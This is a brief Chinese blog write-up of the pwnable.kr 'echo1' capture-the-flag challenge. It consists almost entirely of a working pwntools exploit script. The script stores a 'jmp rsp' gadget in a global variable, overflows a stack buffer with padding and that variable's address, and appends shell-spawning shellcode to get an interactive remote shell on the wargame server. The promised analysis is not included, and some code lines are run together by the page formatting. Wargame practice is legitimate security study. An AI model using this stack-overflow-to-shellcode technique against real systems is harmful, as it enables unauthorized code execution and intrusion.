1. 程式人生 > >pwnable.kr-echo1-Writeup

pwnable.kr-echo1-Writeup

blog inux cnblogs span style symbol bin sym utf-8

pwnable的echo1,一個棧溢出的漏洞,同樣以後再補上分析過程和思路,先放exp

 1 #!/usr/bin/env python
 2 # -*- coding: utf-8 -*-
 3 __Auther__ = M4x
 4 
 5 from pwn import *
 6 context.arch = amd64
 7 context.os = linux
 8 context.log_level = debug
 9 
10 elf = ELF(./echo1)
11 id_addr = elf.symbols[id]
12 #  print hex(id_addr)
13 jmp = asm(jmp rsp) 14 shellcode = asm(shellcraft.sh()) 15 16 # io = process(‘./echo1‘) 17 io = remote(pwnable.kr, 9010) 18 19 io.recvuntil(name? : ) 20 io.sendline(jmp) 21 22 io.recvuntil(> ) 23 io.sendline(1) 24 25 payload = A * 40 + p64(id_addr) + shellcode 26 io.sendline(payload)
27 28 io.interactive() 29 io.close()


pwnable.kr-echo1-Writeup